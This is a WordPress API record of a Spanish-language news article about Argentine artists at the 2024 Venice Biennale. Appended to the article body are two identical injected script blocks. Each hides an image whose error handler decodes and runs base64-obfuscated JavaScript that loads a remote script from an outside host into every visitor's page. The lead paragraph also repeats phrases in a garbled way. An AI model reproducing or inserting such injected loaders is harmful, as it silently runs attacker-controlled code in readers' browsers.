{"id":3943,"date":"2024-04-22T20:37:38","date_gmt":"2024-04-22T23:37:38","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3943"},"modified":"2025-08-13T23:56:51","modified_gmt":"2025-08-14T02:56:51","slug":"nutrida-presencia-argentina-en-la-bienal-de-venecia","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3943","title":{"rendered":"Nutrida presencia argentina en la Bienal de Venecia"},"content":{"rendered":"\n<h5 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-bcbd94a7549834df2dd37a4c7f7f52f3\" style=\"background-color:#08527d\"><em>Desde este s\u00e1bado, y hasta el 24 de noviembre, la 60ta edici\u00f3n de la marat\u00f3nica exposici\u00f3n -bajo la consigna contar\u00e1 c\u201cExtranjeros en todas partes\u201d- contar\u00e1 con obras de bajo la consigna \u201cExtranjeros en todas partes\u201d- contar\u00e1 con presentaciones de Luciana Lamothe, Claudia Alarc\u00f3n, Chiachio &amp; Giannone, La Chola Poblete y Aaron Nachtailer o hist\u00f3ricos como Libero Badii, Lidy Prati y Elda Cerrato, entre otros.<\/em><\/h5>\n\n\n\n<p>Luciana Lamothe, Claudia Alarc\u00f3n, Chiachio &amp; Giannone, La Chola Poblete y Aaron Nachtailer o hist\u00f3ricos como Libero Badii, Lidy Prati, Elda Cerrato, son algunos de los artistas argentinos que estar\u00e1n presentes durante la\u00a0<strong>60ta Bienal de Venecia<\/strong>\u00a0que comienza el s\u00e1bado y se extiende hasta el 24 de noviembre en la ciudad europea.<\/p>\n\n\n\n<p>Con&nbsp;<strong>114 artistas latinoamericanos de 331 artistas exhibidos<\/strong>&nbsp;adem\u00e1s de los m\u00e1s de 80 pabellones internacionales que rodean la 60 Mostra Internazionale d\u2019Arte \u2013 La Biennale di Venezia, en su nombre italiano, curada por el brasile\u00f1o Adriano Pedrosa, el primer latinoamericano en dirigirla.&nbsp;<strong>La marat\u00f3nica exposici\u00f3n aborda la problem\u00e1tica vinculada a la migraci\u00f3n y descolonizaci\u00f3n, centr\u00e1ndose en artistas extranjeros, inmigrantes, diasp\u00f3ricos, exiliados o refugiados.<\/strong><\/p>\n\n\n\n<p>Presentada bajo la consigna \u201cExtranjeros en todas partes\u201d, la exposici\u00f3n estar\u00e1 dividida en cuatro temas: el extranjero, el queer, el ind\u00edgena y el marginal. Su nombre proviene de obras realizadas por el colectivo Claire Fontaine desde 2004 que consisten en esculturas de ne\u00f3n de colores que reproducen la frase hom\u00f3nima en 53 idiomas y que se inspiran, a su vez,&nbsp; \u201cen el nombre de un colectivo anarquista que luch\u00f3 contra la xenofobia en Tur\u00edn a principios de la d\u00e9cada de 2000\u201d, informa la Bienal.&nbsp;<\/p>\n\n\n\n<p>Desde el s\u00e1bado, en el Arsenale el p\u00fablico podr\u00e1 visitar la instalaci\u00f3n&nbsp;<strong>\u201cOjala se derrumben las puertas\u201d de Luciana Lamothe<\/strong>&nbsp;curada por Sof\u00eda Dourron en representaci\u00f3n de la Argentina, en el Pabell\u00f3n Argentino.&nbsp;&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/somostelam.com.ar\/wp-content\/uploads\/2024\/04\/Bienal-de-Venecia-2024-pabellon-Argentina-foto-prensa-Matteo-Losurdo-1536x1025.png\" alt=\"\"\/><figcaption class=\"wp-element-caption\"><em>El pabell\u00f3n argentino<\/em><\/figcaption><\/figure>\n\n\n\n<p>\u201cLa exposici\u00f3n y libro que conforman el env\u00edo argentino, habita las fronteras (visibles e invisibles) que separan lo humano de lo no humano, lo natural de lo construido, lo conocido de lo desconocido\u201d desde un entrelazar \u201cmaderas y ca\u00f1os, cuerpos y estructuras, mutabilidad y permanencia, define la curadora el env\u00edo nacional.<\/p>\n\n\n\n<p>Se trata de \u201cespacios dentro de espacios que modulan formas de violencia y hospitalidad en un tenso equilibrio de formas interdependientes\u201d, desde cuatro esculturas que conforman la obra que \u201cinsiste en la posibilidad de operar cambios\u201d en el constructo social como met\u00e1fora.<\/p>\n\n\n\n<p>Adem\u00e1s, entre los&nbsp;<strong>artistas invitados<\/strong>&nbsp;por el curador a la exposici\u00f3n internacional figuran reconocidos e hist\u00f3ricos nacidos en Italia y fallecidos en Argentina como&nbsp;<strong>Libero Badii, Juan Del Prete, Clorindo Testa; tambi\u00e9n Raquel Forner, Mar\u00eda Martorell, Emilio Pettoruti y Lidy Prati; as\u00ed como Juana Elena Diz, Claudia Alarc\u00f3n, La Chola Poblete y Mariana Telleria.&nbsp;&nbsp;<\/strong><\/p>\n\n\n\n<p>El n\u00facleo contempor\u00e1neo se centra en artistas marginalizados, queer y con acento especial en la producci\u00f3n de los pueblos originarios y pr\u00e1cticas consideradas menores. En este espacio tem\u00e1tico est\u00e1n, entre m\u00e1s de un centenar de artistas, la&nbsp;<strong>obra textil de Alarc\u00f3n<\/strong>&nbsp;(Comunidad La Puntana, pueblo Wich\u00ed del norte de Salta), el colectivo de mujeres de la Sil\u00e4t, y tambi\u00e9n el sincretismo de la artista \u201cLa Chola\u201d Poblete y sus v\u00edrgenes queer.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/somostelam.com.ar\/wp-content\/uploads\/2024\/04\/SAKAI-Kazuya-Pintura-91969-acrilico-sobre-tela-130-x-130.png\" alt=\"\"\/><figcaption class=\"wp-element-caption\"><em>Sakai Kazuya, Pintura 9.<\/em><\/figcaption><\/figure>\n\n\n\n<p>El n\u00facleo hist\u00f3rico que consta de tres salas (la di\u00e1spora italiana, abstracci\u00f3n y representaci\u00f3n corporal) re\u00fane obras de Am\u00e9rica Latina, \u00c1frica, Oriente Medio y Asia del siglo XX: se revisa el modernismo cuestionando sus l\u00edmites y definiciones. En este espacio estar\u00e1 la obra del&nbsp;<strong>pintor abstracto argentino de ascendencia japonesa Kazuya Sakai, en el Pabell\u00f3n Central Giardini<\/strong>, por ejemplo, o una pintura de&nbsp;<strong>Forner en retratos y figura humana<\/strong>, y tambi\u00e9n la obra de la artista \u00edtalo-argentina&nbsp;<strong>Elda Cerrato<\/strong>.&nbsp;<\/p>\n\n\n\n<p>Hasta la mexicana&nbsp;<strong>Frida Kahlo<\/strong>&nbsp;estar\u00e1 presente por primera vez en la Bienal con la famosa pintura \u201cDiego y yo\u201d (1949) adquirida por el argentino Eduardo F. Costantini. La tela expuesta en el Malba hasta hace poco es el&nbsp;<strong>\u00faltimo autorretrato pintado por Kahlo antes de su muerte en 1954. En \u00e9l, pinta el rostro de su esposo Diego Rivera como un tercer ojo.<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/somostelam.com.ar\/wp-content\/uploads\/2024\/04\/Bienal-de-Venecia-2024-Frida.png\" alt=\"\"\/><\/figure>\n\n\n\n<p>El Malba presta adem\u00e1s \u201cLa del abanico verde\u201d (1919) de Pettoruti y \u201cTehuana\u201d (1940) de Rosa Rolanda, \u201cRetrato de Ram\u00f3n G\u00f3mez de la Serna\u201d (1915) del mexicano Diego Rivera, \u201cComposici\u00f3n serial\u201d (1948) de Prati y \u201cPintura o C\u00edrculo negro\u201d (1963) del artista y arquitecto Clorindo Testa.<\/p>\n\n\n\n<p>Tambi\u00e9n se expone la instalaci\u00f3n<strong>&nbsp;\u201cDios es inmigrante\u201d de Telleria<\/strong>&nbsp;producida en el marco de Bienalsur 2017 y emplazada en la entrada del Pabell\u00f3n Central de Giardini, informan desde la Bienal impulsada por la Universidad Nacional Tres de Febrero en 2015.&nbsp;&nbsp;<\/p>\n\n\n\n<p>A su vez, en un espacio promocionado aparte participan&nbsp;<strong>Chiachio &amp; Giannone<\/strong>&nbsp;(Leo Chiachio y Daniel Giannone), quienes presentar\u00e1n con dos&nbsp;<strong>instalaciones bajo el nombre de \u201cComechifonnes\u201d<\/strong>. Tambi\u00e9n estar\u00e1 presente en la previa a la inauguraci\u00f3n el acto de compartir el pan al que invita el neuquino radicado en Europa,&nbsp;<strong>Aaron Nachtailer a trav\u00e9s de su propuesta \u201cHerencia\/Errancia\u201d.<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/somostelam.com.ar\/noticias\/cultura\/para-viernes-nutrida-presencia-argentina-en-la-bienal-de-venecia\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img fetchpriority=\"high\" decoding=\"async\" width=\"632\" height=\"108\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/04\/Captura-de-pantalla_22-4-2024_203638_somostelam.com_.ar_.jpeg\" alt=\"\" class=\"wp-image-3944\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/04\/Captura-de-pantalla_22-4-2024_203638_somostelam.com_.ar_.jpeg 632w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/04\/Captura-de-pantalla_22-4-2024_203638_somostelam.com_.ar_-300x51.jpeg 300w\" sizes=\"(max-width: 632px) 100vw, 632px\" \/><\/a><figcaption class=\"wp-element-caption\">Fuente:<\/figcaption><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Desde este s\u00e1bado, y hasta el 24 de noviembre, la 60ta edici\u00f3n de la marat\u00f3nica exposici\u00f3n -bajo la consigna contar\u00e1 c\u201cExtranjeros en todas partes\u201d- contar\u00e1 con obras de bajo la consigna \u201cExtranjeros en todas partes\u201d- contar\u00e1 con presentaciones de Luciana Lamothe, Claudia Alarc\u00f3n, Chiachio &amp; Giannone, La Chola Poblete y Aaron Nachtailer o hist\u00f3ricos como [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3945,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[16,22],"tags":[],"class_list":{"0":"post-3943","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ferias-y-congresos","8":"category-internacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3943"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3943"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3943\/revisions"}],"predecessor-version":[{"id":6799,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3943\/revisions\/6799"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3945"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3943"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3943"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3943"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}